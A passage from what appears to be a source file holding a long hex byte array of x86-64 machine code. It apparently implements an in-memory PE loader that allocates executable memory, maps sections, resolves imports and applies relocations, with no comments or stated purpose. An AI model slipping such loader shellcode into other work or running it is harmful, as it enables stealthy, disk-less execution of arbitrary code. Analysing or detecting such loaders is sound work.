376 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc2, 0x04, 0x06, 0x00, 0x00,
377 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x98, 0x00, 0x00, 0x00,
378 0x48, 0x83, 0xbd, 0x98, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x1d, 0x02,
379 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40,
380 0x28, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
381 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x42, 0x30, 0x48, 0x8b,
382 0x95, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4a, 0x28, 0x48, 0x8b, 0x95,
383 0xa0, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00,
384 0x83, 0xbd, 0xac, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xbc, 0x01, 0x00,
385 0x00, 0x48, 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
386 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x04, 0x08, 0x00,
387 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xfa, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
388 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
389 0x8b, 0x95, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x92, 0x04, 0x08, 0x00, 0x00,
390 0x41, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00,
391 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x83,
392 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xbb, 0x00, 0x00, 0x00,
393 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x97, 0x00, 0x00, 0x00,
394 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00,
395 0x00, 0x00, 0x8b, 0x55, 0xec, 0x89, 0xd2, 0x48, 0x83, 0xc2, 0x04, 0x48,
396 0x89, 0xd1, 0x48, 0xc1, 0xe1, 0x09, 0x48, 0x8b, 0x95, 0xb0, 0x00, 0x00,
397 0x00, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2, 0x08, 0x48, 0x89, 0xd1, 0xff,
398 0xd0, 0x48, 0x89, 0x45, 0x78, 0x66, 0xc7, 0x45, 0x70, 0x08, 0x00, 0x48,
399 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x90, 0x00, 0x00,
400 0x00, 0x4c, 0x8d, 0x45, 0x70, 0x48, 0x8d, 0x55, 0xec, 0x48, 0x8b, 0x8d,
401 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00,
402 0x83, 0xbd, 0xac, 0x00, 0x00, 0x00, 0x00, 0x79, 0x25, 0x48, 0x8b, 0x85,
403 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48,
404 0x8b, 0x95, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
405 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
406 0xec, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xec, 0x48, 0x8b, 0x85, 0xb0, 0x00,
407 0x00, 0x00, 0x8b, 0x90, 0x04, 0x08, 0x00, 0x00, 0x8b, 0x45, 0xec, 0x39,
408 0xc2, 0x0f, 0x87, 0x51, 0xff, 0xff, 0xff, 0x83, 0xbd, 0xac, 0x00, 0x00,
409 0x00, 0x00, 0x0f, 0x88, 0x95, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8,
410 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x00, 0x48, 0x8b,
411 0x80, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00,
412 0x48, 0x8b, 0x4a, 0x30, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x55, 0xc0,
413 0x48, 0x8b, 0x55, 0x18, 0x48, 0x89, 0x55, 0xc8, 0x48, 0x8b, 0x55, 0x20,
414 0x48, 0x89, 0x55, 0xd0, 0x48, 0x8b, 0x95, 0x98, 0x00, 0x00, 0x00, 0x4c,
415 0x8d, 0x45, 0x50, 0x4c, 0x89, 0x44, 0x24, 0x30, 0x4c, 0x8b, 0x85, 0xb8,
416 0x00, 0x00, 0x00, 0x4c, 0x89, 0x44, 0x24, 0x28, 0x4c, 0x8d, 0x45, 0xc0,
417 0x4c, 0x89, 0x44, 0x24, 0x20, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41,
418 0xb8, 0x18, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00,
419 0x00, 0x48, 0x83, 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x74, 0x1a, 0x48,
420 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00,
421 0x00, 0x48, 0x8b, 0x95, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff,
422 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8,
423 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x98, 0x00, 0x00, 0x00, 0x48, 0x89,
424 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b,
425 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0, 0x00, 0x00, 0x00,
426 0x48, 0x89, 0xd1, 0xff, 0xd0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x81,
427 0xc4, 0x48, 0x01, 0x00, 0x00, 0x5b, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
428 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
429 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74,
430 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x00,
431 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x30,
432 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40,
433 0x30, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40,
434 0x38, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
435 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55,
436 0x18, 0x48, 0x8b, 0x52, 0x38, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b,
437 0x45, 0x18, 0x48, 0xc7, 0x40, 0x38, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
438 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48,
439 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x48, 0x8b,
440 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x28, 0x48, 0x89,
441 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x28, 0x00,
442 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48,
443 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20,
444 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48,
445 0x8b, 0x52, 0x20, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18,
446 0x48, 0xc7, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
447 0x48, 0x8b, 0x40, 0x18, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45,
448 0x18, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10,
449 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x89, 0xd1, 0xff,
450 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x18, 0x00, 0x00, 0x00,
451 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x85, 0xc0,
452 0x74, 0x44, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b,
453 0x00, 0x48, 0x8b, 0x40, 0x58, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52,
454 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
455 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55,
456 0x18, 0x48, 0x8b, 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b,
457 0x45, 0x18, 0x48, 0xc7, 0x40, 0x10, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
458 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48,
459 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b,
460 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x08, 0x48, 0x89,
461 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x08, 0x00,
462 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x85,
463 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b,
464 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x12,
465 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x00,
466 0x00, 0x00, 0x00, 0x00, 0x90, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55,
467 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb,
468 0x0a, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x83, 0x45, 0x18, 0x01, 0x48,
469 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x12, 0x48, 0x8b,
470 0x45, 0x10, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00,
471 0x38, 0xc2, 0x74, 0xd9, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x0f,
472 0xb6, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x0f, 0xb6, 0xc0,
473 0x29, 0xc2, 0x89, 0xd0, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0xd0, 0x01,
474 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89,
475 0x8d, 0x60, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x08, 0x01, 0x00, 0x00,
476 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x10, 0x01, 0x00, 0x00, 0x00,
477 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa0, 0x31, 0xc0, 0x48, 0x79, 0xc7, 0x45,
478 0xa4, 0x1b, 0x8b, 0x44, 0x24, 0xc7, 0x45, 0xa8, 0x04, 0x8b, 0x4c, 0x24,
479 0xc7, 0x45, 0xac, 0x08, 0x8b, 0x54, 0x24, 0xc7, 0x45, 0xb0, 0x0c, 0x52,
480 0x81, 0xc2, 0xc7, 0x45, 0xb4, 0x00, 0x02, 0x00, 0x00, 0xc7, 0x45, 0xb8,
481 0x83, 0xe9, 0x01, 0x75, 0xc7, 0x45, 0xbc, 0xf4, 0xff, 0xd0, 0xc3, 0xc7,
482 0x45, 0xc0, 0x48, 0x81, 0xec, 0x48, 0xc7, 0x45, 0xc4, 0x01, 0x00, 0x00,
483 0x48, 0xc7, 0x45, 0xc8, 0x89, 0xac, 0x24, 0x30, 0xc7, 0x45, 0xcc, 0x01,
484 0x00, 0x00, 0x48, 0xc7, 0x45, 0xd0, 0x89, 0x9c, 0x24, 0x38, 0xc7, 0x45,
485 0xd4, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xd8, 0x89, 0xbc, 0x24, 0x20,
486 0xc7, 0x45, 0xdc, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xe0, 0x89, 0xb4,
487 0x24, 0x28, 0xc7, 0x45, 0xe4, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xe8,
488 0x89, 0xe6, 0x48, 0x89, 0xc7, 0x45, 0xec, 0xcf, 0xb8, 0x00, 0x02, 0xc7,
489 0x45, 0xf0, 0x00, 0x00, 0x4c, 0x89, 0xc7, 0x45, 0xf4, 0xc1, 0x48, 0x8d,
490 0x14, 0xc7, 0x45, 0xf8, 0x01, 0x4c, 0x8d, 0x04, 0xc7, 0x45, 0xfc, 0x02,
491 0x4d, 0x8d, 0x0c, 0xc7, 0x45, 0x00, 0x00, 0x49, 0x8d, 0x1c, 0xc7, 0x45,
492 0x04, 0x01, 0x48, 0x89, 0x9c, 0xc7, 0x45, 0x08, 0x24, 0x00, 0x01, 0x00,
493 0xc7, 0x45, 0x0c, 0x00, 0x48, 0x01, 0xc3, 0xc7, 0x45, 0x10, 0x48, 0x89,
494 0x9c, 0x24, 0xc7, 0x45, 0x14, 0x08, 0x01, 0x00, 0x00, 0xc7, 0x45, 0x18,
495 0x48, 0x01, 0xc3, 0x48, 0xc7, 0x45, 0x1c, 0x89, 0x9c, 0x24, 0x10, 0xc7,
496 0x45, 0x20, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x24, 0x01, 0xc3, 0x48,
497 0x89, 0xc7, 0x45, 0x28, 0x9c, 0x24, 0x18, 0x01, 0xc7, 0x45, 0x2c, 0x00,
498 0x00, 0xff, 0xd7, 0xc7, 0x45, 0x30, 0x48, 0x89, 0xf4, 0x48, 0xc7, 0x45,
499 0x34, 0x8b, 0xb4, 0x24, 0x28, 0xc7, 0x45, 0x38, 0x01, 0x00, 0x00, 0x48,
500 0xc7, 0x45, 0x3c, 0x8b, 0xbc, 0x24, 0x20, 0xc7, 0x45, 0x40, 0x01, 0x00,
501 0x00, 0x48, 0xc7, 0x45, 0x44, 0x8b, 0x9c, 0x24, 0x38, 0xc7, 0x45, 0x48,
502 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x4c, 0x8b, 0xac, 0x24, 0x30, 0xc7,
503 0x45, 0x50, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x54, 0x81, 0xc4, 0x48,
504 0x01, 0xc7, 0x45, 0x58, 0x00, 0x00, 0xc3, 0x00, 0x48, 0x8b, 0x85, 0x60,
505 0x01, 0x00, 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01,
506 0x75, 0x16, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x05, 0x48,
507 0x07, 0x00, 0x00, 0x48, 0x89, 0x85, 0x18, 0x01, 0x00, 0x00, 0xeb, 0x15,
508 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07,
509 0x00, 0x00, 0x48, 0x89, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
510 0x18, 0x01, 0x00, 0x00, 0x48, 0x05, 0x18, 0x19, 0x00, 0x00, 0x48, 0x89,
511 0x85, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00,
512 0x48, 0x89, 0x85, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x00,
513 0x00, 0x00, 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0x00,
514 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xf0, 0x00, 0x00,
515 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x40,
516 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xe8, 0x00,
517 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85,
518 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x8b,
519 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00,
520 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b,
521 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x50, 0x04, 0x48, 0x8b, 0x85,
522 0xd8, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x04, 0x66, 0x39, 0xc2, 0x0f,
523 0x85, 0xa1, 0x06, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00,
524 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x95, 0xf0, 0x00, 0x00, 0x00, 0x8b,
525 0x52, 0x50, 0x81, 0xc2, 0x00, 0x10, 0x00, 0x00, 0x89, 0xd2, 0x41, 0xb9,
526 0x40, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, 0x00,
527 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x08, 0x01, 0x00, 0x00,
528 0x48, 0x83, 0xbd, 0x08, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x5f, 0x06,
529 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40,
530 0x14, 0x0f, 0xb7, 0xd0, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x48,
531 0x01, 0xd0, 0x48, 0x83, 0xc0, 0x18, 0x48, 0x89, 0x85, 0xd0, 0x00, 0x00,
532 0x00, 0xc7, 0x85, 0x24, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe9,
533 0x9a, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x24, 0x01, 0x00, 0x00, 0x48, 0x89,
534 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03,
535 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x01,
536 0xd0, 0x8b, 0x40, 0x10, 0x41, 0x89, 0xc0, 0x8b, 0x95, 0x24, 0x01, 0x00,
537 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48,
538 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00,
539 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x14, 0x89, 0xc2, 0x48, 0x8b, 0x85,
540 0x00, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0x02, 0x8b, 0x95, 0x24, 0x01,
541 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0,
542 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00,
543 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b,
544 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0xca, 0x48,
545 0x89, 0xc1, 0xe8, 0x4d, 0x20, 0x00, 0x00, 0x83, 0x85, 0x24, 0x01, 0x00,
546 0x00, 0x01, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40,
547 0x06, 0x0f, 0xb7, 0xc0, 0x3b, 0x85, 0x24, 0x01, 0x00, 0x00, 0x0f, 0x87,
548 0x4c, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b,
549 0x80, 0x90, 0x00, 0x00, 0x00, 0x89, 0x85, 0xcc, 0x00, 0x00, 0x00, 0x8b,
550 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00,
551 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x38, 0x01, 0x00, 0x00, 0xe9, 0x39,
552 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b, 0x40,
553 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01,
554 0xd0, 0x48, 0x89, 0x85, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60,
555 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x95, 0xc0, 0x00,
556 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xb8, 0x00,
557 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x89,
558 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48,
559 0x89, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00,
560 0x00, 0x8b, 0x40, 0x10, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00,
561 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x40, 0x01, 0x00, 0x00, 0x48,
562 0x8b, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0,
563 0x0f, 0x84, 0xa9, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x40, 0x01, 0x00,
564 0x00, 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x48,
565 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x79, 0x30, 0x48,
566 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b,
567 0x95, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x12, 0x0f, 0xb7, 0xd2, 0x48,
568 0x8b, 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2, 0x48,
569 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0xeb, 0x47, 0x48,
570 0x8b, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b, 0x85,
571 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa8, 0x00,
572 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40,
573 0x38, 0x48, 0x8b, 0x95, 0xa8, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x02,
574 0x48, 0x8b, 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2,
575 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x83,
576 0x85, 0x48, 0x01, 0x00, 0x00, 0x08, 0x48, 0x83, 0x85, 0x40, 0x01, 0x00,
577 0x00, 0x08, 0xe9, 0x44, 0xff, 0xff, 0xff, 0x90, 0x48, 0x83, 0x85, 0x38,
578 0x01, 0x00, 0x00, 0x14, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b,
579 0x40, 0x0c, 0x85, 0xc0, 0x0f, 0x85, 0xb5, 0xfe, 0xff, 0xff, 0x48, 0x8b,
580 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x89,
581 0x85, 0xcc, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48,
582 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
583 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x48,
584 0x8b, 0x40, 0x30, 0x48, 0xf7, 0xd8, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85,
585 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa0, 0x00,
586 0x00, 0x00, 0xe9, 0xdc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x28, 0x01,
587 0x00, 0x00, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89, 0x85, 0x30, 0x01, 0x00,
588 0x00, 0xe9, 0x94, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00,
589 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0xa0, 0x75, 0x64,
590 0x48, 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x89, 0xc2, 0x48,
591 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f, 0xb7, 0x00, 0x66, 0x25, 0xff,
592 0x0f, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01,
593 0x00, 0x00, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00,
594 0x8b, 0x00, 0x89, 0xc1, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f,
595 0xb7, 0x00, 0x66, 0x25, 0xff, 0x0f, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc1,
596 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xc8, 0x48, 0x8b,
597 0x08, 0x48, 0x8b, 0x85, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x01, 0xc8, 0x48,
598 0x89, 0x02, 0xeb, 0x16, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f,
599 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x84, 0xc0, 0x0f, 0x85, 0xd9, 0x02,
600 0x00, 0x00, 0x48, 0x83, 0x85, 0x30, 0x01, 0x00, 0x00, 0x02, 0x48, 0x8b,
601 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b,
602 0x85, 0x28, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x3b, 0x85, 0x30,
603 0x01, 0x00, 0x00, 0x0f, 0x85, 0x49, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85,
604 0x30, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, 0x28, 0x01, 0x00, 0x00, 0x48,
605 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x85, 0xc0, 0x0f, 0x85,
